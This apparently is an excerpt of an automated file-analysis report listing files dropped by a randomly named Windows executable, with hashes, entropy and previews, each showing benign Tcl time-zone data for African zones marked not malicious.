                                                                                                                                                                                                                              SHA-256:73FEB807006897B4B485CB82394867444E890265EFE960EC66D6C0E325DA9372
                                                                                                                                                                                                                              SHA-512:2498C380D761A16C183D78BC1BB18B1D2A1BFCB9C703D86A3FC04CCCE43D88C8D4BC3C47CC31639B78A5FE9C8A7445E9DBB52062E2F3B737DA1E7D0FF70F140A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Maputo)]} {.. LoadTimeZoneFile Africa/Maputo..}..set TZData(:Africa/Kigali) $TZData(:Africa/Maputo)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):180
                                                                                                                                                                                                                              Entropy (8bit):4.866127364448228
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsGe/vXHAIgNGESuvHRL/2DcqQFeDcGeyn:SlSWB9vsM3y7VXHAIgNTTN/2DdD4yn
                                                                                                                                                                                                                              MD5:41209A335A99803239A854575190C5ED
                                                                                                                                                                                                                              SHA1:E6EA627C25513B9DDE053F9A24D509AA317C30A1
                                                                                                                                                                                                                              SHA-256:611375C4901AD6C4844C2BB7D02FB17F34996F49E642546A6784D6F0B28530CC
                                                                                                                                                                                                                              SHA-512:DF2C0B131F35F54DF5EBF7F8459F98DBABEB6F081247BA95B5D7B41146E2A2EF9BC6B1D909DE57A1223D9C258AB197D9668ED2E111A365C86BABDAA7DF551FB6
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Lagos)]} {.. LoadTimeZoneFile Africa/Lagos..}..set TZData(:Africa/Kinshasa) $TZData(:Africa/Lagos)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):235
                                                                                                                                                                                                                              Entropy (8bit):4.7936510664790815
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2D4JDm2OHWQvvoHvBsp9boFvoHzIX7uRe6vF9:MB862DymdHWQCvqpmVCzIq
                                                                                                                                                                                                                              MD5:EC08046589E85D999A597252FF5368B7
                                                                                                                                                                                                                              SHA1:126E3DE158E1E7AF4737D0AB5B51C0F92F416DC7
                                                                                                                                                                                                                              SHA-256:DCC9F52F539A67DFD7ABAFDE072ACDAE2B67754C559C8A5FE61979F5A286A066
                                                                                                                                                                                                                              SHA-512:84B9AB18BC343C8B8934F5FDD2E2EB413925B04D6F5394AA8337B7B55E6487FB071A83A69BD4D0FA40F7F31EBC57B9908729674542CEA3083D700FCD02D77633
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Lagos) {.. {-9223372036854775808 815 0 LMT}.. {-2035584815 0 0 GMT}.. {-1940889600 815 0 LMT}.. {-1767226415 1800 0 +0030}.. {-1588465800 3600 0 WAT}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):182
                                                                                                                                                                                                                              Entropy (8bit):4.865878143076229
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsGe/vXHAIgNGESuvHRL/2Dcr7bp4DcGeyn:SlSWB9vsM3y7VXHAIgNTTN/2Dgfp4D4y
                                                                                                                                                                                                                              MD5:35D8A58EE21E603C6FC4FB896AE6B3D0
                                                                                                                                                                                                                              SHA1:F1D0A939D761F3F0954F045814CF5339A5597036
                                                                                                                                                                                                                              SHA-256:AB3E797548C7663CF9ABA7FE163635FF7CAB9E6CB61FA1644C0F7B4B5CCE8B99
                                                                                                                                                                                                                              SHA-512:97717961987F6B6832C24A7833150CDFE7E82BBEB32DFDB84D2500442AAD9263F8BD4E879591E913D56E9A1991C389EF730211853647A889F358AE3FA37C0185
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Lagos)]} {.. LoadTimeZoneFile Africa/Lagos..}..set TZData(:Africa/Libreville) $TZData(:Africa/Lagos)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):182
                                                                                                                                                                                                                              Entropy (8bit):4.862780607964543
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqss1kovXHAIgNGE4pHRL/2Dcih4DcsS:SlSWB9vsM3y7s3HAIgNT4pHN/2DNh4D4
                                                                                                                                                                                                                              MD5:EA21ABBF8B11953916A1C509B8A1B427
                                                                                                                                                                                                                              SHA1:35ADC230C57B001BE8A99A3D2E34B609A60A1162
                                                                                                                                                                                                                              SHA-256:EACA9124F17E5B11F27D11FA6141D19EB3AC23E155E155B73467BDAA3BC99AA7
                                                                                                                                                                                                                              SHA-512:A7972D4F1C5FB988CA04B39E2CDD580F51383BA9D7A66C478275C11A07B8D7A6EFF53A3E1929B0D89F10BCC39D22F285DB2601ED60DB4647C65465643F70C137
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Abidjan)]} {.. LoadTimeZoneFile Africa/Abidjan..}..set TZData(:Africa/Lome) $TZData(:Africa/Abidjan)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):178
                                                                                                                                                                                                                              Entropy (8bit):4.856982839546061
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsGe/vXHAIgNGESuvHRL/2DccLtBQDcGeyn:SlSWB9vsM3y7VXHAIgNTTN/2DXQD4yn
                                                                                                                                                                                                                              MD5:40CD47F6DCF51EBEFEF42489F1716257
                                                                                                                                                                                                                              SHA1:DF245192A1899A72DE01A57F6969AC060E841734
                                                                                                                                                                                                                              SHA-256:4C2FD1E44DFAAF0C0DD2EB56B84B538F1E2D84B301AB2CFB8EE7759783501444
                                                                                                                                                                                                                              SHA-512:D39BEB0EEF344B1A44F7D6A806A1D5B956D7D402648EE0C67C4BA46493236840AF975D89A91B2D33B8AA7D6DC9A051E66718DCDBC1C83B0E964215C2E32ED923
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Lagos)]} {.. LoadTimeZoneFile Africa/Lagos..}..set TZData(:Africa/Luanda) $TZData(:Africa/Lagos)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):185
                                                                                                                                                                                                                              Entropy (8bit):4.940313336280723
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsfKG5XHAIgNGEjKORL/2DcfpT0DcfKB:SlSWB9vsM3y7fnHAIgNTjdN/2D8pT0Dt
                                                                                                                                                                                                                              MD5:71A5DE1276902DB1542840318F9B1AF3
                                                                                                                                                                                                                              SHA1:AC3825BF343482E0E4D9D6FAA6FCA4D1A125433B
                                                                                                                                                                                                                              SHA-256:24384EEC359FD24D181AAEF3C017E3C345490A8D352B29D19B1B143A29A811C2
                                                                                                                                                                                                                              SHA-512:2984EB42A79B8B32BB93DFE71F1C4C0CABFDC9B0A199971347BB3473463FA07FDB5D20227D288BF8653B1BDE347E1297459BBB4C3C34AF7A5434FBF945683577
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Maputo)]} {.. LoadTimeZoneFile Africa/Maputo..}..set TZData(:Africa/Lubumbashi) $TZData(:Africa/Maputo)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):181
                                                                                                                                                                                                                              Entropy (8bit):4.905174746463853
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsfKG5XHAIgNGEjKORL/2DcOf+DcfKB:SlSWB9vsM3y7fnHAIgNTjdN/2DkDEi
                                                                                                                                                                                                                              MD5:1D7FDB388535CC59742CA0F1AEE27FBD
                                                                                                                                                                                                                              SHA1:A99FF2CAC47FD333429C22B271E190D979EEC024
                                                                                                                                                                                                                              SHA-256:B00801A7279741434D9C2D7EC7322DD93B85EA4F5C9976AB3A43F0AB142E1553
                                                                                                                                                                                                                              SHA-512:0174D3C6F9116C36C62AD1EB58203EE7DFE8C37F618B8449D5E45AD6290CF8334F28798877D7A563A12EE533026244D6A49BCCF29B5D7FCB5BCC91481D0DDDE2
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Maputo)]} {.. LoadTimeZoneFile Africa/Maputo..}..set TZData(:Africa/Lusaka) $TZData(:Africa/Maputo)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):178
                                                                                                                                                                                                                              Entropy (8bit):4.857096806490649
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsGe/vXHAIgNGESuvHRL/2Dcn2DcGeyn:SlSWB9vsM3y7VXHAIgNTTN/2D42D4yn
                                                                                                                                                                                                                              MD5:1CA9B3E7BCD5BC1CC881453D16B09389
                                                                                                                                                                                                                              SHA1:1B1964B314E72847D71A42C147CF2BF331B44461
                                                                                                                                                                                                                              SHA-256:35D56EFFE9E7E60F17B32BD30486E566B635F0AE7A8948D77395B8E6332E26F1
                                                                                                                                                                                                                              SHA-512:9E08D57B7824F5B076D159D9A5106E51450DF24729C36F485B9B68E8F47E8DFC50F9BEC3F11E0AE6579A8E372A5C0F0DA18A2E797CF2115519D1B4E5B64413DD
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Lagos)]} {.. LoadTimeZoneFile Africa/Lagos..}..set TZData(:Africa/Malabo) $TZData(:Africa/Lagos)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):149
                                                                                                                                                                                                                              Entropy (8bit):4.952872531197478
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/2DcfKiMXGm2OHoVoHvdSF2I:SlSWB9eg/2DEZDm2OHoVoHvdI
                                                                                                                                                                                                                              MD5:CD429B6891CBF603A93F9A9733E2391B
                                                                                                                                                                                                                              SHA1:C6833B83B6D1694AC632018A27915E6F97F708AE
                                                                                                                                                                                                                              SHA-256:FE6B6A4BE1B61F7F909A3F6137530DFE6D1754499A4D9B0D1CE4952FFF0AE62D
                                                                                                                                                                                                                              SHA-512:6E57B70B71515998AD617954F9DDAE19968B20946542201153DAB47FBE63790D42F41AE29148ECBCE6D12812879BCF0A4EC881507B62CDB2675AB20267220BF9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Maputo) {.. {-9223372036854775808 7820 0 LMT}.. {-2109291020 7200 0 CAT}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):199
                                                                                                                                                                                                                              Entropy (8bit):4.964472328419063
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7HbsSHAIgNTzbrN/2DZQs+DWb4n:MByMaHw7NH/t2DZiDWU
                                                                                                                                                                                                                              MD5:88C8FF2B480648EDADBD0FB93F754275
                                                                                                                                                                                                                              SHA1:BED7A784C378909914CEB0D303DFE6D05FD576B7
                                                                                                                                                                                                                              SHA-256:1D80FD86CB733D57D88ECD404E702F750B233ED0CCBFBFFFEED1AAD3B7F1CB04
                                                                                                                                                                                                                              SHA-512:CB7F831CF099E85B948AE57FCE9D91C7EAAD39753AF82C56EC15B65830EB4115A71BBC83A71A2AC947CAB24DEDDB557E02FAA5A3264546AE6E60607DF6BD2FA3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Johannesburg)]} {.. LoadTimeZoneFile Africa/Johannesburg..}..set TZData(:Africa/Maseru) $TZData(:Africa/Johannesburg)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):200
                                                                                                                                                                                                                              Entropy (8bit):4.957246428185456
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7HbsSHAIgNTzbrN/2DzjEHp4DWb4n:MByMaHw7NH/t2DzjEJ4DWU
                                                                                                                                                                                                                              MD5:CA7255B86425BA706D214924856B6818
                                                                                                                                                                                                                              SHA1:E9BE6CF871BB1786E842953D41392299952EC9AC
                                                                                                                                                                                                                              SHA-256:547197C09C1987350AE5720A4EEC7E8D8F4B9F4A0559726E225E13C707F7C564
                                                                                                                                                                                                                              SHA-512:23F9AD0F926A0945A17BBC3DCFF9A3D7EE68EC9423EA78985F5FFC60CC61641B57871F9AA703B5FB9BE842DCD4693D0641F9EDED702240873F58D24CD4D60C32
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Johannesburg)]} {.. LoadTimeZoneFile Africa/Johannesburg..}..set TZData(:Africa/Mbabane) $TZData(:Africa/Johannesburg)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):187
                                                                                                                                                                                                                              Entropy (8bit):4.877126792757121
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsVVMMvfXHAIgNGExVMeWARL/2DcBEBXCEeDcVVMMyn:SlSWB9vsM3y7VTHAIgNTxcAN/2DFSVDR
                                                                                                                                                                                                                              MD5:5C2E2B5189E0E816D5BD7AFC8B49A35E
                                                                                                                                                                                                                              SHA1:4E43A1ED51399528636D6442B1DDFFD820911407
                                                                                                                                                                                                                              SHA-256:25E221BE49DEC5547A74AEB91B0041859C59BC866987272A447AB2343D1CC30C
                                                                                                                                                                                                                              SHA-512:B74735CFAB692756BAADFB1A51A8CC0C986F981D8E7E7A8182370A9017E67439875F0115820A349AFB3BE2FA581A721440968EF817471DD2C5E1286E53B2FE99
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Nairobi)]} {.. LoadTimeZoneFile Africa/Nairobi..}..set TZData(:Africa/Mogadishu) $TZData(:Africa/Nairobi)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):208
                                                                                                                                                                                                                              Entropy (8bit):4.8660011420394955
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2D3NPDm2OHrFGxYoHvlHIg5pTwdPsy:MB862D3NbmdHhmYCvdIg5GPsy
                                                                                                                                                                                                                              MD5:1B3C94B5098E454981C73C1F2AF80164
                                                                                                                                                                                                                              SHA1:1EBA9E2DBEA70BB1AE5EB13739518AB5A62D2130
                                                                                                                                                                                                                              SHA-256:2BF0D90610211651127402680519B29AB50B15D344263D0C1A22EDEBE5E01E27
                                                                                                                                                                                                                              SHA-512:DA4A0BCE7C6750BD7D3BA76B6301B9390723BE0C001C39BE453D80BD87020C2253A75629F68F83C19410D2A75FAF5223A435299CD4AA53DE545EC7C5B5AA54B7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Monrovia) {.. {-9223372036854775808 -2588 0 LMT}.. {-2776979812 -2588 0 MMT}.. {-1604359012 -2670 0 MMT}.. {63593070 0 0 GMT}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):277
                                                                                                                                                                                                                              Entropy (8bit):4.655052651600954
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2Dk1Dm2OHsvT5oH99VCV22ufPnVCkVBKBQn9q:MB862DGmdHsvVCjkifvdH9q
                                                                                                                                                                                                                              MD5:B640661FB37BB74FAB172DBDF1B433E1
                                                                                                                                                                                                                              SHA1:0236A5B53443A4A18B8B9D6AA7732620BE9A6553
                                                                                                                                                                                                                              SHA-256:BD8E9765174431C0D403249D3E881C949C83966E9F8162552DA88AE53132467B
                                                                                                                                                                                                                              SHA-512:53DCC6DF7C3E0B00A6D98A8DCC4988C8CFD6B53CC89E6F8D32DA41CB532A62D9C6A823675C5039F5639CE0D423F6D571F46F5B93FFC7EFFB4EDFFBF89D46AA12
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Nairobi) {.. {-9223372036854775808 8836 0 LMT}.. {-1946168836 9000 0 +0230}.. {-1309746600 10800 0 EAT}.. {-1261969200 9000 0 +0230}.. {-1041388200 9900 0 +0245}.. {-865305900 10800 0 EAT}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):208
                                                                                                                                                                                                                              Entropy (8bit):4.856754881865487
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2DjUfDm2OHNseoH1axCXFHzaSmkFWTvF9:MB862DjULmdHPC1XNzaS3yz
                                                                                                                                                                                                                              MD5:EDB548348E590C8CFE04ED172D96B86C
                                                                                                                                                                                                                              SHA1:AD3B631FB03819772164402E202AFA781687F597
                                                                                                                                                                                                                              SHA-256:9ADA5F5AFB25E823E1F0E8AD2489AAA1C09F01356634A9403670D7AB21CA2E2C
                                                                                                                                                                                                                              SHA-512:17E396A9BE497077B774AD1108CC8760ED35FC92F65FFF070F9ACD3C4FB67A335C1C57DF1CCB1570DE14B708EFCA0063990A969E30759C9A47731DA45ED25EFE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Ndjamena) {.. {-9223372036854775808 3612 0 LMT}.. {-1830387612 3600 0 WAT}.. {308703600 7200 1 WAST}.. {321314400 3600 0 WAT}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):178
                                                                                                                                                                                                                              Entropy (8bit):4.871519187180041
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsGe/vXHAIgNGESuvHRL/2DcdhA9Ff2DcGeyn:SlSWB9vsM3y7VXHAIgNTTN/2Dsh2f2D1
                                                                                                                                                                                                                              MD5:0134039CD1666E983A9B6E43ABD6AF59
                                                                                                                                                                                                                              SHA1:A2A99345390F4D17C892CEADE58C604257686764
                                                                                                                                                                                                                              SHA-256:B517120AD8DB3F21EAB4E44A78001EE856EB4EA35852C54CCA96D38887DEBCFA
                                                                                                                                                                                                                              SHA-512:E5911ADD3D776D87ACFC986C4D2564E3ED9AB12C67F23391ED35FF2A31AD8314B873E31DB8DA4D5E0DAEA12BE34110A8F0C27C9C6126977BAD51C6AD5CDFA39B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Lagos)]} {.. LoadTimeZoneFile Africa/Lagos..}..set TZData(:Africa/Niamey) $TZData(:Africa/Lagos)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):188
                                                                                                                                                                                                                              Entropy (8bit):4.909962899502589
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqss1kovXHAIgNGE4pHRL/2DcboGb+DcsS:SlSWB9vsM3y7s3HAIgNT4pHN/2Dqbb+c
                                                                                                                                                                                                                              MD5:550E482599C2F4280F2C258019BB2547
                                                                                                                                                                                                                              SHA1:A39045BEF313094CEDC100A7D695AE51BC9E498D
                                                                                                                                                                                                                              SHA-256:64CAF2BF9D45095DF97F419714D5617CF6300ACDB544B621DCE1D594AA9B910C
                                                                                                                                                                                                                              SHA-512:4FD29C5B4C0D2BDE69C437E9BF4F08A11E1DAAA689B69F28F3551F550BDCCDD055E4C1A241EDB2FA48B18825AFF792F4860F55983E106EA8224F1D87ED4F7546
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Abidjan)]} {.. LoadTimeZoneFile Africa/Abidjan..}..set TZData(:Africa/Nouakchott) $TZData(:Africa/Abidjan)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):189
                                                                                                                                                                                                                              Entropy (8bit):4.920023025906233
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqss1kovXHAIgNGE4pHRL/2DcXCZDcsS:SlSWB9vsM3y7s3HAIgNT4pHN/2D1DBS
                                                                                                                                                                                                                              MD5:6CFC4E938E50C9B591F8CC42A14FA82A
                                                                                                                                                                                                                              SHA1:FCE14A5CA62C9005C76D27B849A238E76C834F8A
                                                                                                                                                                                                                              SHA-256:03B9C1FE350B5E9F6F333F9519FA394DCC562308D9388A903AF3D3FECEBDC762
                                                                                                                                                                                                                              SHA-512:98F22F1D23A9930276A2D306A1473E64DC43547A16CFD01226E4F030A26A3CC4FDED77F790583CC5C078FC6DFCCE81C16A50879AE46A0D3A6F1FA98373F413C7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Abidjan)]} {.. LoadTimeZoneFile Africa/Abidjan..}..set TZData(:Africa/Ouagadougou) $TZData(:Africa/Abidjan)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):182
                                                                                                                                                                                                                              Entropy (8bit):4.893842293207225
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsGe/vXHAIgNGESuvHRL/2DcyTKM0DcGeyn:SlSWB9vsM3y7VXHAIgNTTN/2DQD4yn
                                                                                                                                                                                                                              MD5:6D979FCD225D5431C7391AE568C6409F
                                                                                                                                                                                                                              SHA1:6C9DCD222061CC00FD386773C6BB2861F3429A60
                                                                                                                                                                                                                              SHA-256:8FB8692DB9281AE2B087D704168BFD47D3D0901781FEF65BFD62FCB213BA6B50
                                                                                                                                                                                                                              SHA-512:32AFA6AF6BFC3D42CA636DD2B96906048EF1ADFBB135BB7E7B77C444FED99FDABB84FBBADF56EC63828FFA7B3371191FF1311822B1C75241EBD9CF602467088E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Lagos)]} {.. LoadTimeZoneFile Africa/Lagos..}..set TZData(:Africa/Porto-Novo) $TZData(:Africa/Lagos)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):234
                                                                                                                                                                                                                              Entropy (8bit):4.818597723513168
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2DXDm2OHH5oHvzdoH1aNbbFHRMy:MB862DTmdHH5CvzdC16bZRMy
                                                                                                                                                                                                                              MD5:28A5967C797F4B38FB63F823D6F07168
                                                                                                                                                                                                                              SHA1:17872E91683B884191D2E4C777FB79DCE6D73EE7
                                                                                                                                                                                                                              SHA-256:BA1D60DF2B41320F92A123A714E17E576C89383526B96E0541A464C3FBA415B7
                                                                                                                                                                                                                              SHA-512:B335E3D3268631F3A71F4BAD59740F3A5222344E8223C201B8FE885BAA7F1A550FA7778E498D6DC2111F41053856F50B21413AECCE84B80833EC8176F2A1009C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Sao_Tome) {.. {-9223372036854775808 1616 0 LMT}.. {-2713912016 -2205 0 LMT}.. {-1830384000 0 0 GMT}.. {1514768400 3600 0 WAT}.. {1546304400 0 0 GMT}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):186
